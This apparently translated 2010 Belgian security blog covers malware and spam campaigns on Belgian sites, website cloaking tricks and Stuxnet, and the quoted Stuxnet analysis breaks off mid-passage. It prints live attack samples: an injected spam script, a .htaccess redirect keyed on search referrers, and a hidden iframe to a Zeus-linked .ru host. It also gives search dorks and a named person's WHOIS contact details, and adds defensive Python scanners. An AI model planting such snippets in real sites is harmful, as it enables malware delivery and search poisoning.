08/20/2010

some domains you could consider blacklisting, while whitelisting the particular sites you actually need

report from McAfee: see the security dashboard in my Diigo links (documents)


Korean malware IP address 114.207.244.143

This IP address has, according to Google Badware, been a hotbed of malware and infections


as confirmed by TrustedSource (HIGH risk)


new rogue security software from my-security93.co.cc gets past several antivirus products and other protections

yes, on a machine with plain user rights

yes, in Firefox with NoScript

yes, with two antiviruses running on the machine

yes, behind firewalls, proxies, blacklisting and so on

yes, it just popped up and began scanning

I just closed down Firefox abruptly (from the list of applications)

No, I didn't download or install it, because if it can get past all that, what else can it do?

and the list of viruses it claims to have found changes every time

enough to scare the simple user, and if it gets past all these security things, it must be secure or part of the necessary security, no?

It is NOT blacklisted yet

http://www.robtex.com/dns/my-security93.co.cc.html

and according to VirusTotal (http://www.virustotal.com/):

Firefox: Clean site
Google Safebrowsing: Clean site
Opera: Clean site
Phishtank: Clean site
Smartscreen: Clean site
TRUSTe: Clean site

It uses the following Korean servers

114.207.244.143
114.207.244.144
114.207.244.145
114.207.244.146

on which there are a whole lot of other .cc servers (.cc belongs to some small islands and is a frequently abused domain zone)

the technical people responsible are

AS9318
HANARO-AS Hanaro Telecom Inc. Yeoeuido-dong Yeongdeungpo-gu SEOUL 17-7 Asia One Bldg. 150-874

These IP addresses are also used by Malaysian hackers, because their sites are hosted there:

malaysian-hackers.co.cc


08/18/2010

YouTube user thenameisskittles used in online malware campaign with .be sites

It is being done by inserting pages that imitate YouTube pages with videos on other sites

the trick is simple: to view the video one has to download a new codec, but that isn't a codec (it is a virus). But explain that to your teenager who wants to see Justin Bieber and thinks it is some kind of YouTube.

David Evans Controller | management.degarage.nl

This site may harm your computer.
DAVID EVANS CONTROLLER. thenameisskittles 18 videos. Subscribe. 151960 views. Help About Safety Privacy Terms . . david evans controller. . david evans ...
management.degarage.nl/random/index.php?news=david-evans.


The Google dork is: youtube thenameisskittles

and for Belgium you add site:be; you can change that to whatever site or domain you need to check

PROTEUS VSM 7.1 SP4

This site may harm your computer. (ps: all the rest as well)

PROTEUS VSM 7.1 SP4. thenameisskittles 4 videos. Subscribe. ... VSM 7.1 SP4, download PROTEUS VSM 7.1 SP4, EFFECTMATRIX YOUTUBE VIDEO DOWNLOAD TOOL PRO 3.0, ...
www.jolieboutique.be/script/proteus+vsm+7.1+sp4.html

justinbiebermusic.com\/goldenticket

Be sure to subscribe to us, and Turnip Time www.youtube.com Thanks again to all that helped. ..... COM/GOLDENTICKET. thenameisskittles 4 videos Subscribe. ...
os.be/info/justinbiebermusic.com%5C/goldenticket

  1. BARFOOTANDTHOMPSON.CO.NZ
     7 Jun 2010 ... Barfootandthompson.co.nz. belmont stakes odds . BARFOOTANDTHOMPSON.CO.NZ. thenameisskittles 4 videos. Subscribe . Barfootandthompson.co.nz ...
     gt-motorsports.be/webshop/.../barfootandthompson.co.nz.html

  2. EZRECORDED 1.0
     EZRECORDED 1.0. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . EZRecorded 1.0 ...
     www.manzi.be/script/EZRecorded+1.0.html

  3. Hot Video: pilipinas win na win
     13 Aug 2010 ... Na Win (First Episode) 31 July 2010 Brought to you by FlipBooth – The Pinoy Style Youtube . .... thenameisskittles 18 videos. Subscribe ...
     www.fitstar.be/images/page.php?page=pilipinas+win...

  4. LADYLADY345
     GROUP/LADYLADY345. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . ...
     www.loomans-distribution.be/catalog/.../ladylady345.html

  5. /SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE
     SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE. ... /SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE. thenameisskittles 4 videos. Subscribe. 151960 views ...
     www.leathershop.be/...//search+hl+en+q+site+www.youtube.com+youtube.html

  6. Hot Video: lil kim
     YouTube streaming video - Lil' Kim & Ray J Take Shots at Nicki Minaj . - During Lil Kim's Concert in New York ... thenameisskittles 18 videos. Subscribe ...
     www.mrwtrading.be/b2b/images/news.php?page=lil...


sleepy.be (commercial site) totally spam-hacked

site:sleepy.be video, as an example


Supersize Me Video
Supersize Me Video August 5, 2010. ... Supersize Me Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
motieven.sleepy.be/sleepy/supersize-me-video.html

Danny Almonte Video
Danny Almonte Video August 8, 2010. ... Danny Almonte Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
motieven.sleepy.be/sleepy/danny-almonte-video.html

Elke The Stallion
Download Elke The Stallion and Maliah Michel (Digital Dolls) video on savevid.com. ... I give you video model Elke the Stallion. Checkout her site, crazy. ...
motieven.sleepy.be/sleepy/elke-the-stallion.html

Khia New Video
12 Aug 2010 ... Khia looks so excited to be trapped in a TV in Janet's new video . On the heels of her new single, “Been A Bad Girl,” Khia took time off . ...
motieven.sleepy.be/sleepy/khia-new-video.html

Cspan Video
8 Aug 2010 ... Cspan Video August 8, 2010. ... Cspan Video. Template design by Free CSS Templates · cynthia rodriguez · lake county indiana ...
motieven.sleepy.be/sleepy/cspan-video.html

Royce Reed Video
6 Aug 2010 ... Royce Reed Video August 6, 2010. ... Royce Reed Video. Template design by Free CSS Templates · tommy bowden · phiten necklaces ...
motieven.sleepy.be/sleepy/royce-reed-video.html

Pygmy Tarsier Video
Pygmy Tarsier Video August 7, 2010. ... Pygmy Tarsier Video. Template design by Free CSS Templates · brooke astor · mark loretta · highdeas · matt holliday ...
motieven.sleepy.be/sleepy/pygmy-tarsier-video.html

City High Caramel Video
6 Aug 2010 ... City High Caramel Video August 6, 2010. ... City High Caramel Video. Template design by Free CSS Templates ...
motieven.sleepy.be/sleepy/city-high-caramel-video.html


Belgian site uses Justin Bieber to place malware

Jamie Bieber Boyfriend Hot Video

27 Jul 2010 ... jamie bieber boyfriend hot video · jamie boyfriend hot video justin bieber · bieber boyfriend hot video jamie foxx ...
motieven.sleepy.be/.../jamie-bieber-boyfriend-hot-video.html
Looking that up gives this:
person: Vadim Makarenko
address: Leningradskaya 28 kv 26, Bendery, Moldova
e-mail: XXXXXXX@gmail.com
phone: +373-680-45324
nic-hdl: VM3351-RIPE
source: RIPE # Filtered

This is a redirect

It tries to install malware

they haven't noticed it since the 27th of July ..... and we are the 19th

going to report it to the CERT here

Panda Labs found another 200 such sites

I just tried the obvious title with site:be and found this one, but you can do this for any other country or domain extension

"hot video : justin bieber" site:be


critical Adobe PDF and Flash updates

Adobe is planning to release critical updates on August 19, 2010 for Adobe Reader 9.3.3 for Windows, Macintosh and Unix as well as the Adobe Acrobat 9.3.3 for Windows and Macintosh and an update for Adobe Reader 8.2.3 and Acrobat 8.2.3 for Windows and Macintosh covered in security bulletin APSB10-17. An update for Adobe Flash Player published in security bulletin APSB10-16 will be released as well.

Affected Software

Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh

Adobe Flash Player 10.1.53.64 and earlier versions for Windows, Macintosh, Linux, and Solaris
http://isc.sans.edu/index.html

You have no choice but to install them: the number of attacks on these vulnerabilities is too big and the botnets that use them (Zeus, for example) are too dangerous


08/17/2010

stad mechelen forgot about its old blog but spammers didn't

You have the website stadmechelen.be, which now resolves to mechelen.be

under stadmechelen.be, which is still active, you have blog.stadmechelen.be, but that doesn't resolve to blog.mechelen.be or to a www.blog.stadmechelen.be; the blog has been transferred to mechelenblogt.be

so far so good, but

as the website stadmechelen.be is still active (as a redirect), blog.stadmechelen.be is also still active

and has been abused by the following injected script

<title>Best Searches</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" media="all" href="http://find.gl/js.css" />
<script>
function init_aw(){
var children = document.getElementsByTagName('td');
var l = children.length;
var ri = 0;
for(i=0;i<l;i++){
if (children[i].className=='ac'){
children[i].onmouseover=function (){this.className='ach';};
children[i].onmouseout=function (){this.className='ac';};
children[i].onclick=new Function('document.location="' + results[ri][3] + '";');
ri++;
}
}
}
</script>
</head>
<body>
<script src="http://find.gl/js.php?qr=3&f=h&q=inurl%3Acracks%2..."></script>
<script>document.onload=init_aw();</script>
</body>

and that gives you the following search results

crack black and white 2 , download, cd to mp3 ripper v 5.2 serialz, counter strike license torrent,
www.blog.stadmechelen.be/7645

EWallet cell phone, download nitto 1320 cheat engine, 228289, crack sonar 4.01 producer edition,
www.blog.stadmechelen.be/5951

sonic pc download full, update firmware dth 222 2006, katja kassin sex and submission movie,

for the foreign readers:
* Mechelen is a big city near Brussels
* it has its fair share of problems and possible risks
* according to official government rules, its official website is one of the main instruments of crisis communication if needed


observatoire du tourisme wallonie.be infected with Viagra spam

link


Lkioweytrert generic zovirax - zovirax what is it viagra valium kamagra discreet uk europe - las vegas kamagra viagra about valtrex aciclovir zovirax - when does patent on valtrex expire imitrex story - purchase imitrex cash on del what is paxil - how ...
observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

DrLaquanda 1, cheap viagra in moldova, kmb, purchase zovirax in djibouti, gcnrcx, purchase sumycin in iowa, 016928, buy biaxin er online without a prescription, ldm, buy darvocet in alberta, knk, buy cheap tadalafil online cheap vs generic., :-]],
observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

SynxavIQZxwdi tramadol imq viagra ljpem xanax hun buy 150 tramadol =] acomplia qjws Proposé le 23 mai 2010, par TRJdivGdAAK tYMwqLGQnhuXmg no prescription cialis 41514 retin :-[ buy href tramadol 363 ultram pill identifier 4856 tramadol
observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

http://miguelcabrera.us/index.html comment5, Tamiflu, Zithromax, Nolvadex, Retin-A, Viagra, Metformin, Proposé le 13 juillet 2010, par Ambien http://tulowitzki.us/index.html comment5, Xanax, Tamiflu, Nolvadex, Retin-A, Bactrim, Proposé ...
observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

DrLou 1, cheapest sale viagra purchase viagra buy in uk high quality. online no prescription ! !, [url="http://wvagp.org/Forums/members/Buy-VIAGRA-On-Line.aspx"]cheapest sale viagra purchase viagra buy in uk high quality. online no ...
observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...


a hidden compromised website: now the PHP trick

We have seen in the previous post how one attacker hides his compromise by using Apache server modules to serve different pages to normal visitors (the website) and to search engines (the spam/scam pages he added).

There is also another trick one can do, according to the Internet Storm Center.

One can add to a PHP site a script that asks a controller which page to serve to whom, and its instructions would be more or less identical.

"The attackers planted one file (usually called page.php or wp-page.php) on every web site – they didn’t change anything else. The page.php script does the majority of work. It actually just asks the main controller what to do when it receives a request. The request sent to the controller is interesting – it downloads another PHP script from the controller and executes it via an eval() call. This allows the attackers to be able to constantly change how any script behaves. This master script, in a nutshell, does this:

First it checks if the request to the page.php script contains the “r=” parameter. If it doesn’t (meaning, you accessed the script directly) it displays a 404 error. Clever, so they hide it if you try to access it directly.

1. if the User Agent shows that the request is coming from a Google, Yahoo or Bing bot, special content with links to rogue securityware is returned.

2. if you visit the script directly (no referrer) it again displays a 404 error.

3. if the referrer is set to Google, Yahoo or Bing (meaning, the user clicked on a search result), the browser is redirected to a third site (and possible fourth) that displays the infamous RogueAV"

The rest of the technical details is explained in the post, but it is clear that if you use PHP you should patch and harden all the time, and if you can't do it yourself you should make sure your hoster does it for you; otherwise sooner or later you will be cooked.
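The behaviour the diary describes leaves a fingerprint in your own access log: the same planted file answers 404 to a direct visit but serves content to a crawler or to a click-through from a search engine. The script below is an added example (not code from the ISC diary or from this blog) that looks for exactly that split over combined-format Apache log lines; the log lines are constructed and the file names page.php / wp-page.php are the ones the diary mentions.

```python
"""Spot the page.php cloaking pattern from the diary above in an Apache access log.

Added example, not code from the ISC diary or from this blog. It assumes the
Apache "combined" log format and that the planted script keeps the names the
diary mentions (page.php / wp-page.php). The log lines below are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# combined format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PLANTED_NAMES = {"page.php", "wp-page.php"}        # file names named in the diary
BOT_UA = re.compile(r"googlebot|slurp|bingbot", re.I)
ENGINE_REFERER = re.compile(r"^https?://([^/]+\.)?(google|yahoo|bing)\.", re.I)

# constructed sample log: a search-engine bot gets content, a direct visit gets
# a 404, a click-through from Google gets a redirect, a normal page is untouched
SAMPLE_LOG = [
    '66.249.65.1 - - [19/Aug/2010:09:12:01 +0200] "GET /page.php?r=8f2 HTTP/1.1" 200 5120 '
    '"-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '81.82.1.2 - - [19/Aug/2010:09:13:10 +0200] "GET /page.php HTTP/1.1" 404 219 '
    '"-" "Mozilla/5.0 (Windows; U; Windows NT 6.1) Firefox/3.6.8"',
    '81.82.1.3 - - [19/Aug/2010:09:14:05 +0200] "GET /page.php?r=8f2 HTTP/1.1" 302 0 '
    '"http://www.google.be/search?q=hot+video" "Mozilla/5.0 (Windows; U; Windows NT 6.1) Firefox/3.6.8"',
    '81.82.1.4 - - [19/Aug/2010:09:15:00 +0200] "GET /index.php HTTP/1.1" 200 8800 '
    '"-" "Mozilla/5.0 (Windows; U; Windows NT 6.1) Firefox/3.6.8"',
]


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(referer, user_agent):
    """Bucket a request the way the planted script does: crawler, search click, or direct."""
    if BOT_UA.search(user_agent):
        return "engine_bot"
    if ENGINE_REFERER.search(referer):
        return "search_click"
    return "direct"


def find_cloaking(lines):
    """Flag planted-looking paths whose response depends on who is asking.

    A path is reported when direct visits only ever see 404 while crawlers or
    search click-throughs get a 2xx/3xx answer for the very same file.
    """
    statuses = defaultdict(lambda: defaultdict(set))   # path -> bucket -> {status}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        if path.rsplit("/", 1)[-1] not in PLANTED_NAMES:
            continue
        statuses[path][classify(rec["referer"], rec["ua"])].add(int(rec["status"]))

    findings = []
    for path, buckets in statuses.items():
        direct = buckets.get("direct", set())
        served = buckets.get("engine_bot", set()) | buckets.get("search_click", set())
        if direct and direct <= {404} and any(s < 400 for s in served):
            findings.append({
                "path": path,
                "direct": sorted(direct),
                "engine_bot": sorted(buckets.get("engine_bot", set())),
                "search_click": sorted(buckets.get("search_click", set())),
            })
    return findings


if __name__ == "__main__":
    for f in find_cloaking(SAMPLE_LOG):
        print(f"{f['path']}: direct={f['direct']} bot={f['engine_bot']} click={f['search_click']}")
```

Run it over a real log with `find_cloaking(open("access.log"))`; a file that is in PLANTED_NAMES but never appears in your own deployment is worth a look even before any split shows up.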


another twist in compromising websites: .htaccess control and search engine poisoning

We have seen that some malvertising (and drive-by malware downloads or redirects) is only shown to a certain subset of visitors, and this was also seen in some DNS poisoning, if I remember correctly.

In this post from the Internet Storm Center there is something even more interesting: trying to hide the fact that a site is compromised (probably from search engines and security bots scanning for infections and take-overs).

The same site is sometimes infected/taken over and sometimes not, just the normal library site.

"Rather than mucking around with the code for the site itself, the bad guys target the .htaccess files.  For those of you unfamiliar with the workings of webservers, .htaccess files are used by the Apache webserver (and some others…) to provide a way to make configuration changes to the server itself, on a per-directory basis.  So, for instance, you can use an .htaccess file to change the way that the webserver treats specific types of files in a single directory only.

The bad guys also leverage another Apache “tool,” known as mod_rewrite. This tool provides a rule-based rewriting engine (based on a regular-expression parser) to rewrite requested URLs on the fly.

So, while I never actually got my hands on an altered .htaccess file, I have a pretty good idea of what they look like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*(cialis|viagra|levitra).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*(cialis|viagra|levitra).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*(cialis|viagra|levitra).*$
RewriteRule .* http://badsite.com [R,L]"

http://isc.sans.edu/diary.html?storyid=9388

The result is that when Google comes by it will index the added pages with scams and spam in the best case, and porn, pirated films or credit cards in the worst case. This should show up in your logs, if they didn't change the logging to suppress it for these new pages. Your normal visitors, and probably you yourself, will see nothing of that and will work on a normal website as ever before.

It means that you need tripwire-like monitoring of everything on your webserver. If something changes somewhere you should know, or be able to know.
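Two things a defender can automate from this post: recognise the referrer-keyed rewrite block quoted above when it turns up in an .htaccess file, and keep hash snapshots of those files so a change is noticed at all. The script below is an added example (not the ISC diary's or this blog's code); the .htaccess samples are constructed, with the cloaking block taken from the quote, and example.org stands in for the site's own host.

```python
"""Scan .htaccess text for the referrer-keyed mod_rewrite cloaking quoted above,
and diff hash snapshots so any change to those files gets noticed (the
tripwire-like monitoring the post asks for).

Added example, not the ISC diary's or this blog's code. The .htaccess samples
below are constructed; the cloaking block is the one quoted in the post.
"""
import hashlib
import re

SEARCH_ENGINES = re.compile(r"google|yahoo|bing", re.I)
CLIENT_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")   # what cloaking rules key on
EXTERNAL_URL = re.compile(r"^https?://", re.I)

# constructed: the rule set quoted in the post, followed by an ordinary HTTPS redirect
CLOAKED_HTACCESS = """
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*(cialis|viagra|levitra).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*(cialis|viagra|levitra).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*(cialis|viagra|levitra).*$
RewriteRule .* http://badsite.com [R,L]
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example.org/$1 [R=301,L]
"""
# constructed: what a clean file for the same site might look like
CLEAN_HTACCESS = """
RewriteEngine On
# pretty URLs for the blog
RewriteRule ^blog/([0-9]+)$ /index.php?p=$1 [L]
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example.org/$1 [R=301,L]
"""


def parse_rewrite_blocks(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    blocks, conds = [], []
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append({"var": parts[1].upper(), "pattern": parts[2]})
        elif directive == "rewriterule" and len(parts) >= 3:
            blocks.append({"conds": conds, "pattern": parts[1], "target": parts[2]})
            conds = []
    return blocks


def suspicious_blocks(text, own_hosts=()):
    """Return rewrite blocks that send search-engine traffic off-site.

    A block is reported when at least one condition tests the referrer or the
    user agent for a search-engine name and the rule's target is an absolute
    URL on a host that is not one of own_hosts.
    """
    own = tuple(h.lower() for h in own_hosts)
    findings = []
    for block in parse_rewrite_blocks(text):
        keyed = [c for c in block["conds"]
                 if any(v in c["var"] for v in CLIENT_VARS) and SEARCH_ENGINES.search(c["pattern"])]
        target = block["target"].lower()
        off_site = bool(EXTERNAL_URL.match(target)) and not any(h in target for h in own)
        if keyed and off_site:
            findings.append({"target": block["target"],
                             "conditions": [f"{c['var']} {c['pattern']}" for c in keyed]})
    return findings


def snapshot(files):
    """{path: content} -> {path: sha256}; store the baseline out of the web root."""
    return {p: hashlib.sha256(c.encode()).hexdigest() for p, c in files.items()}


def diff_snapshots(baseline, current):
    """Compare two snapshots; returns (changed, added, removed) path lists."""
    changed = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return changed, added, removed


if __name__ == "__main__":
    base = snapshot({"/var/www/.htaccess": CLEAN_HTACCESS})
    now = snapshot({"/var/www/.htaccess": CLOAKED_HTACCESS, "/var/www/img/.htaccess": ""})
    print("changed/added/removed:", diff_snapshots(base, now))
    for f in suspicious_blocks(CLOAKED_HTACCESS, own_hosts=("example.org",)):
        print("cloaking rule ->", f["target"], "keyed on", f["conditions"])
```

A newly added .htaccess in an image or upload directory is as much of a signal as a changed one, which is why the diff reports additions separately.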


Humo, Libelle and Télémoustique were lucky; others are still sleeping malware agents for nemohuildiin.ru

first, not all sites or pages that show up in the Google dorks are in fact still infected; the reason is that they didn't indicate to Google that they were the owners of the domain, so Google didn't come back after the clean-up.

But it does show that these sites were injected with this kind of script and maybe haven't reviewed their security policies, and can be abused again in future.

If you read the post on the Internet Storm Center it is interesting that those infections were for the moment not only very professional but also didn't load any malware... until when? When you take into consideration that the site in question is on the list of Zeus botnet command and control servers, you can only assume that they were building a new network for a new attack (linked to spam that would have sent their users to these pages on these normal, trustworthy, popular websites of popular magazines). Or that some of the network has been disbanded or taken over and that they couldn't get access to their infected 'sleeping cells' (terrorism language).

and this advice you should post on your wall somewhere

"SQL injection is bad and something people need to avoid by developing web applications safely. There are some tips for this:

  • Sanitize input data: Input entered from the user should not contain any sql sentences or commands at all. Check for good data by validating for type, length, format, and range.
  • Use stored procedures: Your web application should have predetermined SQL sentences for data access. If the user requests some specific information, the application invokes the specific stored procedure, so there is no possibility of crafting dynamic SQL requests.
  • Use an account with restricted permissions in the database. You should only grant execute permissions to selected stored procedures in the database and provide no direct table access.
  • Avoid disclosing database error information. Make sure you do not disclose detailed error messages to the user, because detailed error information shows the attacker where to check if the attack was unsuccessful."

http://isc.sans.edu/diary.html?storyid=9397


08/16/2010

fast-flux botnet campaigns with .eu domain names

Arbor Networks

iseveral.eu
lifestylerxdrugs.eu
medicationjobs.eu
nypharmacyjobs.eu
rxdrugscentral.eu
rxdrugsdot.eu
rxdrugsinc.eu
selfcarepharmacy.eu
superhotpharmacy.eu
yourchoicepharmacy.eu

these are pure fast-flux domain names that can only be blocked by the .eu operator (Belgian based)

It is clear that many of those new fast-flux domain names are being used for health spam campaigns

Many of them are .ru domain names (and .com and .net, but you can't block those domain extensions)


security problems with NTLM make me laugh

There have been some problems with NTLM and some hype and crisis communication about it

But NTLM was never intended to be a very secure protocol for communication and authentication.

In Windows 7 it is off by default.

You should use Kerberos.

Don't go on trying to fix old NTLM; just use Kerberos or smart card authentication or whatever

and for the articles, it is summertime...


small hosters and ISPs targeted by malware hosters

not to attack you

but to pay you real hard dollars for hosting

as long as you don't ask too many questions

and don't have too much security

and don't respond too quickly to complaints about me


it has in fact been seen over the last year, but is becoming more of a 'flux hosting' method, jumping from one host to another

The problem with such small ISPs/hosters is that in small countries they are so important in their own country/network that many other businesses and even government services are affected when the world begins to blacklist the whole network/host/domain zone. As these are small networks or countries, most of the world doesn't care a bit about their network or domain extension, because the relative influence is nil.

Just block it, we don't have time for this; let them clean up their business and then we will see afterwards; we have more important things to do than a domain extension, network or country very few care about.

This is what is happening with .lv (Latvia) and Spamhaus (with the security community siding with Spamhaus)

So even if you are a small hoster, ISP, network or domain extension you still need to

* have a general minimal security installation (antivirus, firewall, IDS, ...)

* have a contactable security team that responds quickly to incidents that are brought to their attention or that they have detected

otherwise you are just thrown into the black hole of the internet, ready to be forgotten


better a web application firewall than having to make your pages turn into this

when some big Belgian sites were attacked with the Zeus redirection scripts, they had to act swiftly because Belgian visitors were actively being redirected

so they deactivated the HTML, the scripts and the links

but this makes some old pages look ugly


the alternative is setting up a WAF with a blacklist in front of your sites, filtering incoming and outgoing traffic, to defend yourself, your visitors/clients, and your income, as you can't then be used to attack others and be sued for it.


when you have cleaned up your SQL injections, go to Google

As long as you haven't gone to Google, registered yourself and inserted the code in your websites that proves you are the domain owner, you can't ask Google to revisit your pages quickly and to forget that you were once infected or hacked

Many sites today are still listed in Google as hacked or injected

Those that were injected run the highest chance of simply being blocked by lists and crawlers

and who will want to go to a page for which they receive a warning,

while there are thousands of other pages from your competitors to visit that don't have such a warning?

example:

Links | Libelle
Libelle is the magazine for the active woman who values not only her family but also her own development and the world she lives in.
www.libelle.be/lib/op-stap/links.html?subcatId=113

Te koop - ABIP IMMO
Gemeente: Roosdaal<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe> Prijs: € 285.000,00 ...
www.abipimmo.be/showresults.asp?Tid=322

It also means that all those searches for scripts and hacks that show thousands of pages aren't necessarily accurate, but they do show at the very least that the person didn't finish the job completely (so can you expect them to also block the injections in future?)

once attacked, always scanned and attacked
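The injected tag in the search snippet above is the thing to look for in your own pages before asking Google to recrawl: an iframe pointing off-site that is sized to zero or styled invisible. The scanner below is an added example (not this blog's code) that pulls such iframes out of page HTML; the HTML is constructed around the tag quoted above, with abipimmo.be as the site's own host.

```python
"""Find hidden off-site iframes like the nemohuildiin.ru one in the search snippet above.

Added example, not this blog's code. It takes page HTML and the site's own
host name and reports iframes that point off-site while being made invisible
(zero/one-pixel size or display:none), which is what the Zeus injection looked like.
The HTML below is constructed around the injected tag quoted in the post.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# constructed page for www.abipimmo.be: one injected hidden iframe, one
# legitimate visible embed, one same-site iframe
SAMPLE_HTML = """<html><body>
<h1>Te koop</h1>
<p>Gemeente: Roosdaal<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe> Prijs: ...</p>
<iframe src="http://www.youtube.com/embed/abc" width="425" height="344"></iframe>
<iframe src="/map.html" width="1" height="1"></iframe>
</body></html>"""


def is_hidden(attrs):
    """True when the frame is sized away or styled invisible."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def is_own_host(host, own_host):
    """own_host and its subdomains count as the site itself."""
    return host == own_host or host.endswith("." + own_host)


class HiddenIframeFinder(HTMLParser):
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): v for k, v in attrs}
        src = a.get("src") or ""
        host = (urlsplit(src).hostname or self.own_host).lower()   # relative src = same site
        if not is_own_host(host, self.own_host) and is_hidden(a):
            self.findings.append({"src": src, "host": host, "line": self.getpos()[0]})


def find_hidden_iframes(html, own_host):
    """Return the off-site hidden iframes in html, with the line each sits on."""
    p = HiddenIframeFinder(own_host)
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML, "abipimmo.be"):
        print(f"line {f['line']}: hidden iframe to {f['host']} ({f['src']})")
```

Run it against the HTML as served to a visitor (not the file on disk), since injections done through .htaccess or a planted PHP script only appear in the response.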


finding infected hosts with trustedsource.org (Telenet, Belgacom and other Belgians)

When you go to www.trustedsource.org you can type in the name of a domain and then you will see whether it is generally trusted or not

If you have more than one host or server that may send mail, you will see further down the page the change in the number of emails being sent from each host or server.

Normally an increase of at least 100% will probably have something to do with a virus or a spam operation

Let's take for example http://www.trustedsource.org/query/telenet.be

Then you will find the following hosts which, according to this analysis, are probably infected (all on a Sunday)

http://www.trustedsource.org/query/81.82.254.17

http://www.trustedsource.org/query/81.82.233.5

http://www.trustedsource.org/query/84.199.49.98

http://www.trustedsource.org/query/81.82.197.34

The same goes for skynet.be

http://www.trustedsource.org/query/194.78.197.208

http://www.trustedsource.org/query/194.78.221.215

or scarlet.be

http://www.trustedsource.org/query/62.235.228.87

http://www.trustedsource.org/query/62.235.232.224

http://www.trustedsource.org/query/62.235.241.85

http://www.trustedsource.org/query/62.235.242.195

http://www.trustedsource.org/query/62.235.249.90

http://www.trustedsource.org/query/81.11.183.156

and so on

this means that all those hosts are sending spam and viruses onto the world wide web, where they have been captured by honeypots.

this means that the ISPs have a problem with their argument that they are defending their walls instead of offering free security software to their clients, as the New Telecom asks them to


08/12/2010

patching and security of Apple software on Windows comes second

When I read this blog post by a researcher who found another critical bug in Safari (Swiss cheese), the following is clear:

* the internal security tests for Safari are not sufficient

* they first fix the bug for the Apple environment and only then eventually research and patch the bug for the Windows environment

If this is true, it changes the risk of letting users use Safari (or maybe any other Apple software) on your Windows network..... if you even thought that would be a good idea.


an absolute must-read for people working with SCADA and critical infrastructure

If what is written in this blog weren't so important I wouldn't have copied it in its entirety. But if you read what the researchers have found out about Stuxnet (the father of the .lnk vulnerability that is now also present in documents) then you will see that you will have to monitor every change of code that happens on a machine. For the moment this is only for these particular installations, but it may be the next generation of rootkits, which we maybe should call 'codekits': they replace one set of code with another without changing anything outwardly in the availability and functionality of the machine or application.

"As we’ve explained in our recent W32.Stuxnet blog series, Stuxnet infects Windows systems in its search for industrial control systems, often generically (but incorrectly) known as SCADA systems. Industrial control systems consist of Programmable Logic Controllers (PLCs), which can be thought of as mini-computers that can be programmed from a Windows system. These PLCs contain special code that controls the automation of industrial processes—for instance, to control machinery in a plant or a factory. Programmers use software (e.g., on a Windows PC) to create code and then upload their code to the PLCs.

Previously, we reported that Stuxnet can steal code and design projects and also hide itself using a classic Windows rootkit, but unfortunately it can also do much more. Stuxnet has the ability to take advantage of the programming software to also upload its own code to the PLC in an industrial control system that is typically monitored by SCADA systems. In addition, Stuxnet then hides these code blocks, so when a programmer using an infected machine tries to view all of the code blocks on a PLC, they will not see the code injected by Stuxnet. Thus, Stuxnet isn’t just a rootkit that hides itself on Windows, but is the first publicly known rootkit that is able to hide injected code located on a PLC.

In particular, Stuxnet hooks the programming software, which means that when someone uses the software to view code blocks on the PLC, the injected blocks are nowhere to be found. This is done by hooking enumeration, read, and write functions so that you can’t accidentally overwrite the hidden blocks as well.

Stuxnet contains 70 encrypted code blocks that appear to replace some “foundation routines” that take care of simple yet very common tasks, such as comparing file times and others that are custom code and data blocks. Before some of these blocks are uploaded to the PLC, they are customized depending on the PLC.

